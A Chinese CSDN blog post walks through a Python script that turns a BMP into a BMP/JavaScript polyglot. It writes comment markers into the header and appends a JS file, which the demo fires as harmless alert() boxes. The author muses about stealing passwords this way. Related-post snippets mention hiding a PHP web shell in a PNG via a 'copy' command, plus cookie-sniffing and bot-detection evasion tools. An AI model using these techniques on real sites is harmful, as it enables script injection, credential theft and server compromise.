Python 图片注入js

最新推荐文章于 2023-02-08 14:22:38 发布
最新推荐文章于 2023-02-08 14:22:38 发布
阅读量2.7k 收藏 10
点赞数 16
分类专栏: 我爱学习 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fang_mu_mu/article/details/106990065
版权

Python 关于图片注入js

前段时间618呢,某宝上入手了几本python的书籍,对于一个PHPer来说,Python简直是打开了我新世界的大门啊!而只用python写过爬虫的我,就在端午假最后一天晚上,在《Python黑客攻防入门》P.91上翻到一篇好玩的东西——图片文件黑客攻击!(不是打广告哦)

基本原理

把一张bmp图片用python二进制文件模式(r+b)打开,插入一段注释开始符+JS代码+注释结束符,那么在页面中引入该图片,运行脚本也以图片的形式来运行,就可以在加载图片时,运行其中的js代码啦!
那么扩展一下,假如你进入了一个网页加载了一张图片,在该页面中输入了一些隐私信息,比如马云宝密码~~那通过图片中插入的js脚本是不是可以把这串密码发送到我指定的地址呢,我也不确定我没有实践过,插个眼等周末在玩。
这里就执行一个最简单的js,弹出一个框~

实现步骤

1.新建一张bmp位图 , 下载或者使用画图工具,生成一张bmp图片,在编辑器中打开,这里我用的是vscode中+hexdump扩展(show hexdump),打开可以看到这样子的:42对应ASCII码的B,4D则对应M,就是后面的BM啦,这个被称为魔数,只要这个不被破坏,那浏览器就能正确读这个位图文件;
bmp十六进制2.接下来新建一个python文件,用于二进制打开这张图片并且向其中插入js代码;
文件名我用了绝对路径,相对路径不行,这里再插个flag周末研究,嘻嘻~

#!/usr/local/bin/python3.6
# --- coding:UTF-8 ---
# @Author: fang
# @File: E:\VScode\workspace\Hack\ImageHacking.py
# @Date: 2020/06/28
# @Time: 00:45:08

# @Describe :bmp图片插入JS脚本
import os
fname = "E:/VScode/workspace/Hack/hello.bmp"

pfile = open(fname, "rb")
buff = pfile.read()
#替换掉可能引发错误的*与/
buff.replace(b'\x2A\x2F',b'\x00\x00')
pfile.close()

pfile = open(fname, "wb")
pfile.write(buff)
#以起始位置为基准,光标后移两位
pfile.seek(2,0)
pfile.write(b'\x2F\x2A')
pfile.close()

pfile = open(fname,"ab")
pfile.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
pfile.write(open ('E:/VScode/workspace/Hack/hello.js','rb').read())
pfile.close()
print('success !')

3.写下一个超简单的js ,复杂点的js就按老规矩等不上班啦;

alert('test');
alert('bmp');

4.新建一个HTML ,主要的代码就两句,引入图片,使用脚本:如果不成功试试绝对路径哈~

<img src="hello.bmp" />
<script src="hello.bmp"></script>

5. 结果,正确的结果应该是图片可以正常显示,并且js运行有两个弹框~偷个懒,太晚了白天还要上班…
附一张bmp位图发生改变的图片收个尾
在这里插入图片描述
就写这些吧,第一篇博客,写的有点简陋,还请大家见谅~大致表达的意思就是图片文件的攻击,相信聪明的猿(媛)都能看懂哒。
后面还会更一些我觉得好玩的python及demo吧,嗯就这样~喜欢的小伙伴记得三连。
在这里插入图片描述

Echo FangMuMu
关注
  • 16
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
脚本后门注入图片新方法(转载)
江湖·郎中·路
08-17 2573
 自从臭要饭的发布了那个脚本隐藏于图片中的程序之后(没看的朋友参见Bugkidz上的文章),不断就有人来说什么程序不好用拉,图片生成不了啦什么的。于是乎昨天我就重新研究了一下原理。突然想到了用一种新方法就是用copy命令进行图片与脚本的合并,却一直发现行不通,原因是不明:我一用copy合并后,图片的结构就被我破坏了,放到网页上不是图片只显示了一点就是干脆一个红叉。百思不得其解,发到论坛上请教又没人
PyQt5内嵌浏览器注入JavaScript脚本实现自动化操作的代码实例
12-31
应同学邀请,演示如何使用 PyQt5 内嵌浏览器浏览网页,并注入 Javascript 脚本实现自动化操作。 下面测试的是一个廉价机票预订网站(http://www.flyscoot.com/),关键点如下 使用 QWebEngineView 加载网页,并显示...
图片攻击-BMP图片注入恶意JS代码 <转载>
weixin_30929295的博客
10-29 634
昨天看到一篇文章《hacking throung images》,里面介绍了如何在BMP格式的图片注入JS代码,使得BMP图片既可以正常显示, 也可以运行其中的JS代码,觉得相当有趣。 执行JS注入的脚本 关键:构造符合正常BMP格式的图片 步骤 1. 将原BMP文件的第三,第四字节替换为\x2F\x2A, 对应js中的注释符号/* BMP文件的第三、四、五、六字节表示BMP文件的大小 2. 在...
php 图片中的恶意代码,图片攻击-BMP图片注入恶意JS代码 <转载>
weixin_33462804的博客
03-27 955
昨天看到一篇文章《hacking throung images》,里面介绍了如何在BMP格式的图片注入JS代码,使得BMP图片既可以正常显示, 也可以运行其中的JS代码,觉得相当有趣。 执行JS注入的脚本 关键:构造符合正常BMP格式的图片 步骤 1. 将原BMP文件的第三,第四字节替换为\x2F\x2A, 对应js中的注释符号/* BMP文件的第三、四、五、六字节表示BMP文件的大小 2. 在...
BMP图片注入恶意JS代码
wcc526的专栏
10-28 3825
BMP图片注入恶意JS代码
js/css脚本放到png图片中的实践。
huobengle
12-11 351
起因 高级浏览器支持data协议,如: 参考:http://en.wikipedia.org/wiki/Data:_URL &lt;imgsrc="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAABlBMVEUAAAD///+l2Z/dAAAAM0lEQVR4nGP4/5/h/1+G/58ZDrAz3...
图片加载js--图片被动加载
chen_wen_xian的专栏
06-11 657
Javascript实现的页面图片被动加载类,在使用前用1像素图像进行占位,并给img添加 自定义_src属性 ,当有图片进入可视区域内时,载入图片,提高页面载入速度,节省不必要的流量和连接数。主函数获取其他脚本注册到window上的onscroll和onresize事件,避免冲突。 本代码在IE6 firefox3.6 Firefox4.0 chrome opera 11.10中测试通过。被动加
浏览器自动化过检测(Python+JS算法)
最新发布
03-16
总的来说,浏览器自动化过检测是爬虫技术中一项重要且复杂的任务,涉及到Python编程、JavaScript注入、算法设计以及网络通信等多个领域的知识。理解并掌握这些技能,有助于提高爬虫的稳定性和成功率。
selenium防检测注入 stealth.min.js
03-06
用于selenium的防检测的js注入 python代码为: with open('stealth.min.js') as f: js = f.read() driver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {"source": js}) (积分不够的私聊我)
py-cookieJsInjection:一个从网络嗅探 cookie 并输出可用于将 cookie 注入任何浏览器的 Javascript 代码python 脚本
06-03
一个简单的sidejacking工具,使用javascript cookie注入。 该软件会嗅探任何 cookie 接口,并生成可注入任何浏览器的 javascript 代码,方法是将其粘贴到 URL 栏中。 它附带一个脚本: OSx10.6_monitorMode.py ,它...
android webview 图片上传 4.4解决方案 防js注入webview
04-08
Android Webview upload 图片上传 ! 导读: Android HTML 打开相册上传照片 扩充 webview 防止js注入 解决 android webview 在4.4系统上无法使用情况 博客地址 : http://blog.csdn.net/aaawqqq/article/details/51087805
CS50:CS50的使用Python和Javascript进行Web编程
04-13
随着Node.js的出现,JavaScript也被用于服务器端编程,实现了全栈开发的可能性。 **CSS**: Cascading Style Sheets(CSS)是用于描述HTML或XML(包括SVG、MathML等各种XML方言)文档样式的样式表语言。CSS允许...
JS代码隐藏在图片中的方法
biyusr的专栏
08-28 1154
之前写过利用图片重写的方法清除图片中恶意代码的文章,java清除恶意代码,但这些图片中的恶意代码是怎么植入进去的呢,有简便方法,也有复杂方法。先来看如下这张图片,是Google的LOGO,是一张完全正常的png图片: 用UltraEdit打开,一切正常,看不到其它JS代码,如下: 下面是一段我们用来测试的JavaScript代码: <script type="text/javascript"> function writerJSToImage(){ alert('hello s
脚本后门注入图片程序
^_^-Beluga, ^_^-Stefli
04-23 1745
@echo off echo. echo         ********************************** echo         脚本后门注入图片程序 By 我非我 echo         mail:wofeiwo1987@yahoo.com.cn echo         QQ:309088292 echo         ***********************
js注入
瞬间空白的博客
10-23 1047
原文链接:http://www.jb51.net/article/92639.htm 最近刚出了新闻,阿里四名网络安全部门员工利用网页漏洞写js脚本抢月饼,于是兴致来了,想了解一下这个js脚本到底怎么写,各种刷单各种抢枪抢又是怎么实现的。  什么是javascript注入攻击? 1.每当接受用户输入的内容并重新显示这些内容时,网站就很容易遭受 JavaScript 注入攻击。让我们研
脚本后门注入图片新方法<图片+一句话***>
weixin_33923148的博客
12-07 540
创建一个 shell.php 的一句话***,通过 window 下 copy 命令 copy 123.png+shell.php 123.png 重新生成一个 123.png 的图片。上传到服务服务器上,直接拿菜刀连。 转载于:https://blog.51cto.com/zhpfbk/1880430...
怎么把代码图片里面进行注入_揭秘代码分层后的新世界
weixin_39719472的博客
11-29 400
引导语大家好,我是文贺,一名工作五年的一线 Java 开发,主要擅长 Java 源码、DDD(领域驱动设计)、业务中台框架的落地,本次我们分享的主题名称叫做:代码分层后的新世界,其核心思想就是和大家一起讨论下目前比较通用的分层架构,讨论一下其由来、优点和简单的代码落地实践。2 主要内容2.1 代码不分层,迟早要崩溃。14 年参加工作的时候,写了一年的 MVC 架构,大概的后端工程结构(我们说的是后...
分享118个JS图片代码,总有一款适合您
zy0412326的专栏
02-08 814
js
python selenium注入js代码
10-10
要在Python Selenium中注入JS代码,可以使用execute_script()方法。该方法可以将JS代码作为参数传递,并在当前的浏览器窗口中执行。例如,以下代码将通过Selenium打开百度首页,并在搜索框中输入关键字“Python”: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值